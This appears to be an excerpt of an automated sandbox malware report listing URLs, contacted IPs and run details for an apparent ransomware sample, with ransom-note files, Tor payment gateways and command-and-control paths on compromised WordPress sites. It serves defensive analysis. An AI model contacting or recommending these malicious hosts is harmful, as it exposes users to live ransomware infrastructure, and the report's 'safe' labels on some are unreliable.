                                                        https://www.serenitynowbooksandgifts.com/svcmtr.exe, 00000002.00000003.516398200.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.00000000006ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://www.xfree86.org/)svcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.google.com/images/x2.gifsvcmtr.exe, 00000002.00000003.407162065.00000000036F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.ecma-international.org/memento/codeofconduct.htmsvcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://aoei243548ld.keedo93i1lo.com/%S0t8amSU3vd.exe, 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp, 0t8amSU3vd.exe, 00000000.00000002.345370025.0000000000520000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875409973.0000000000240000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000B.00000002.370984556.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000B.00000002.370940853.0000000000260000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000C.00000002.387290975.00000000002C0000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000C.00000002.387316507.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000D.00000002.406412332.0000000000240000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000D.00000002.406449433.0000000000431000.00000002.00000001.01000000.00000005.sdmptrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.unicode.org/cldr/data/.svcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.google.com/images/dot2.gifsvcmtr.exe, 00000002.00000003.407162065.00000000036F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://play.google.com/log?format=json&hasfast=truesvcmtr.exe, 00000002.00000003.454330167.0000000002980000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://zpr5huq4bgmutfnf.onion.to/Bmsvcmtr.exe, 00000002.00000002.876613547.00000000036F0000.00000004.00000020.00020000.00000000.sdmptrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://tools.ietf.org/html/rfc1950svcmtr.exe, 00000002.00000003.454330167.0000000002980000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://docs.google.comsvcmtr.exe, 00000002.00000003.422925708.00000000039A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://shmetterheath.ru/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://crl.entrust.net/2048ca.crl0svcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34Bsvcmtr.exe, 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp, notepad.exe, 00000015.00000002.875324829.000000000017E000.00000004.00000020.00020000.00000000.sdmp, restore_files_gpmus.txt48.2.dr, restore_files_gpmus.txt112.2.dr, restore_files_gpmus.txt293.2.dr, restore_files_gpmus.txt119.2.dr, restore_files_gpmus.txt382.2.dr, restore_files_gpmus.txt411.2.dr, restore_files_gpmus.txt327.2.dr, restore_files_gpmus.txt376.2.dr, restore_files_gpmus.txt155.2.dr, restore_files_gpmus.txt379.2.dr, restore_files_gpmus.txt404.2.dr, restore_files_gpmus.txt303.2.dr, restore_files_gpmus.txt133.2.dr, restore_files_gpmus.txt146.2.dr, restore_files_gpmus.txt174.2.dr, restore_files_gpmus.txt292.2.dr, restore_files_gpmus.txt181.2.dr, restore_files_gpmus.txt402.2.dr, restore_files_gpmus.txt397.2.drtrue
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://clients6.google.comsvcmtr.exe, 00000002.00000003.454330167.0000000002980000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.linuxnet.comsvcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://www.google.com/images/cleardot.gifsvcmtr.exe, 00000002.00000003.407162065.00000000036F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://ocsp.entrust.net03svcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.876613547.00000000036F0000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://upx.sourceforge.net/upx-license.html.svcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34Bsvcmtr.exe, 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp, notepad.exe, 00000015.00000002.875324829.000000000017E000.00000004.00000020.00020000.00000000.sdmp, restore_files_gpmus.txt48.2.dr, restore_files_gpmus.txt112.2.dr, restore_files_gpmus.txt293.2.dr, restore_files_gpmus.txt119.2.dr, restore_files_gpmus.txt382.2.dr, restore_files_gpmus.txt411.2.dr, restore_files_gpmus.txt327.2.dr, restore_files_gpmus.txt376.2.dr, restore_files_gpmus.txt155.2.dr, restore_files_gpmus.txt379.2.dr, restore_files_gpmus.txt404.2.dr, restore_files_gpmus.txt303.2.dr, restore_files_gpmus.txt133.2.dr, restore_files_gpmus.txt146.2.dr, restore_files_gpmus.txt174.2.dr, restore_files_gpmus.txt292.2.dr, restore_files_gpmus.txt181.2.dr, restore_files_gpmus.txt402.2.dr, restore_files_gpmus.txt397.2.drtrue
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.google.com/log?format=json&hasfast=truesvcmtr.exe, 00000002.00000003.454330167.0000000002980000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://sandbox.google.com/payments/v4/js/integrator.jssvcmtr.exe, 00000002.00000003.407162065.00000000036F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://developer.mozilla.org/en-US/Add-ons/SDK/High-Level_APIs/simple-storagesvcmtr.exe, 00000002.00000003.526806159.00000000006ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://mozilla.org/MPL/2.0/.svcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://creativecommons.org/.svcmtr.exe, 00000002.00000003.402410787.00000000006FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.unicode.org/Public/svcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://hangouts.clients6.google.comsvcmtr.exe, 00000002.00000003.454330167.0000000002980000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://meet.google.comsvcmtr.exe, 00000002.00000003.422925708.00000000039A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://relaxngcc.sf.net/).svcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.teenpornotube.org/wp-content/themes/r.phpsvcmtr.exe, 00000002.00000002.876613547.00000000036F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://angularjs.orgsvcmtr.exe, 00000002.00000003.408228286.00000000038A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://oss.oracle.com/projects/webkit-java-mods/svcmtr.exe, 00000002.00000003.753072751.0000000003733000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://www.nexus.hu/upxsvcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://github.com/angular/materialsvcmtr.exe, 00000002.00000003.408228286.00000000038A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.sgi.com/software/opensource/glx/license.html.svcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://ocsp.entrust.net0Dsvcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://tartarus.org/~martin/PorterStemmersvcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://www-googleapis-staging.sandbox.google.comsvcmtr.exe, 00000002.00000003.407162065.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.407092366.0000000002980000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://www.sgi.com/software/opensource/cid/license.htmlsvcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://zpr5huq4bgmutfnf.onion.to0t8amSU3vd.exe, 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp, 0t8amSU3vd.exe, 00000000.00000002.345370025.0000000000520000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875409973.0000000000240000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000B.00000002.370984556.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000B.00000002.370940853.0000000000260000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000C.00000002.387290975.00000000002C0000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000C.00000002.387316507.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000D.00000002.406412332.0000000000240000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000D.00000002.406449433.0000000000431000.00000002.00000001.01000000.00000005.sdmptrue
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://www.apache.org/licenses/LICENSE-2.0svcmtr.exe, 00000002.00000003.753072751.0000000003733000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.454330167.0000000002980000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.google.com/intl/en-US/chrome/blank.htmlsvcmtr.exe, 00000002.00000003.407092366.0000000002980000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.unicode.org/Public/.svcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://zpr5huq4bgmutfnf.onion.to/%S0t8amSU3vd.exe, 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp, 0t8amSU3vd.exe, 00000000.00000002.345370025.0000000000520000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875409973.0000000000240000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000B.00000002.370984556.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000B.00000002.370940853.0000000000260000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000C.00000002.387290975.00000000002C0000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000C.00000002.387316507.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000D.00000002.406412332.0000000000240000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000D.00000002.406449433.0000000000431000.00000002.00000001.01000000.00000005.sdmptrue
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://crl.entrust.net/server1.crl0svcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.876613547.00000000036F0000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://oss.oracle.com/projects/gstreamer-mods/svcmtr.exe, 00000002.00000003.753072751.0000000003733000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://www.apache.org/licenses/svcmtr.exe, 00000002.00000003.753072751.0000000003733000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://serenitynowbooksandgifts.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496Asvcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.00000000006ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            		unknown
                                                                                                            https://www.serenitynowbooksandgifts.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABDsvcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.00000000006ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            		unknown
                                                                                                            https://serenitynowbooksandgifts.com/svcmtr.exe, 00000002.00000002.875689270.00000000006AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            		unknown
                                                                                                            http://www.unicode.org/reports/svcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://fgainterests.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496svcmtr.exe, 00000002.00000003.526806159.00000000006ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://meetings.clients6.google.comsvcmtr.exe, 00000002.00000003.454330167.0000000002980000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://zpr5huq4bgmutfnf.tor2web.org0t8amSU3vd.exe, 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp, 0t8amSU3vd.exe, 00000000.00000002.345370025.0000000000520000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875409973.0000000000240000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000B.00000002.370984556.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000B.00000002.370940853.0000000000260000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000C.00000002.387290975.00000000002C0000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000C.00000002.387316507.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000D.00000002.406412332.0000000000240000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000D.00000002.406449433.0000000000431000.00000002.00000001.01000000.00000005.sdmpfalse
                                                                                                                • Avira URL Cloud: malware
                                                                                                                		unknown
                                                                                                                http://crl.pkioverheid.nl/DomOvLatestCRL.crl0svcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.torproject.org/projects/torbrowser.html.en0t8amSU3vd.exe, 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp, 0t8amSU3vd.exe, 00000000.00000002.345370025.0000000000520000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875409973.0000000000240000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000B.00000002.370984556.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000B.00000002.370940853.0000000000260000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000C.00000002.387290975.00000000002C0000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000C.00000002.387316507.0000000000431000.00000002.00000001.01000000.00000005.sdmp, svcmtr.exe, 0000000D.00000002.406412332.0000000000240000.00000004.00001000.00020000.00000000.sdmp, svcmtr.exe, 0000000D.00000002.406449433.0000000000431000.00000002.00000001.01000000.00000005.sdmp, notepad.exe, 00000015.00000002.875324829.000000000017E000.00000004.00000020.00020000.00000000.sdmp, restore_files_gpmus.txt48.2.dr, restore_files_gpmus.txt112.2.dr, restore_files_gpmus.txt293.2.dr, restore_files_gpmus.txt119.2.dr, restore_files_gpmus.txt382.2.dr, restore_files_gpmus.txt411.2.dr, restore_files_gpmus.txt327.2.dr, restore_files_gpmus.txt376.2.dr, restore_files_gpmus.txt155.2.drfalse
                                                                                                                    		high
                                                                                                                    http://errors.angularjs.org/1.6.4-localsvcmtr.exe, 00000002.00000003.408228286.00000000038A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://ipinfo.io/ip0t8amSU3vd.exe, svcmtr.exe, svcmtr.exe, 00000002.00000002.875689270.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.00000000006D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://www.ecma-international.orgsvcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD977svcmtr.exe, 00000002.00000003.762757058.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.755159581.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.767533797.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.671880034.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.766203672.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.761900567.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.772593472.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.763661219.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.660754432.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.765866382.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.764581660.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.763893449.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.771267902.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.660454927.0000000003733000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.765633512.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.762361432.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.770304239.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.466108647.0000000003750000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.773528671.0000000003750000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      http://teenpornotube.org/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C91884649svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      http://www.unicode.org/copyright.html.svcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://secure.comodo.com/CPS0svcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.876613547.00000000036F0000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://ledshoppen.nl/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD9svcmtr.exe, 00000002.00000002.876613547.00000000036F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://upx.tsx.orgsvcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown

                                                                                                                          World Map of Contacted IPs

                                                                                                                          • No. of IPs < 25%
                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                          • 75% < No. of IPs

                                                                                                                          Public IPs

                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                          34.117.59.81
                                                                                                                          		ipinfo.ioUnited States
                                                                                                                          		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                          199.116.254.169
                                                                                                                          		fgainterests.comUnited States
                                                                                                                          		46549GVOUStrue
                                                                                                                          103.198.0.111
                                                                                                                          		zpr5huq4bgmutfnf.tor2web.orgSingapore
                                                                                                                          		32780HOSTINGSERVICES-INCUStrue
                                                                                                                          185.230.63.171
                                                                                                                          		serenitynowbooksandgifts.comIsrael
                                                                                                                          		58182WIX_COMILtrue
                                                                                                                          172.217.168.68
                                                                                                                          		www.google.comUnited States
                                                                                                                          		15169GOOGLEUSfalse
                                                                                                                          239.255.255.250
                                                                                                                          		unknownReserved
                                                                                                                          		unknownunknownfalse
                                                                                                                          67.22.44.2
                                                                                                                          		teenpornotube.orgNetherlands
                                                                                                                          		48684VIKINGHOSTNLtrue
                                                                                                                          34.149.87.45
                                                                                                                          		td-ccm-neg-87-45.wixdns.netUnited States
                                                                                                                          		2686ATGS-MMD-ASUSfalse

                                                                                                                          Private

                                                                                                                          IP
                                                                                                                          192.168.2.13
                                                                                                                          192.168.2.23
                                                                                                                          192.168.2.15
                                                                                                                          192.168.2.14
                                                                                                                          192.168.2.255

                                                                                                                          General Information

                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                          Analysis ID:1586217
                                                                                                                          Start date and time:2025-01-08 21:08:42 +01:00
                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                          Overall analysis duration:0h 9m 11s
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:full
                                                                                                                          Cookbook file name:default.jbs
                                                                                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                          Number of analysed new started processes analysed:22
                                                                                                                          Number of new started drivers analysed:2
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:0
                                                                                                                          Technologies:
                                                                                                                          • HCA enabled
                                                                                                                          • EGA enabled
                                                                                                                          • AMSI enabled
                                                                                                                          Analysis Mode:default
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Sample name:0t8amSU3vd.exe
                                                                                                                          (renamed file extension from none to exe, renamed because original name is a hash value)
                                                                                                                          Original Sample Name:ad340c9ea5510d1f0f6149fae0bd5349d6e8b01df4eccc9a2bb300be4bc9d981
                                                                                                                          Detection:MAL
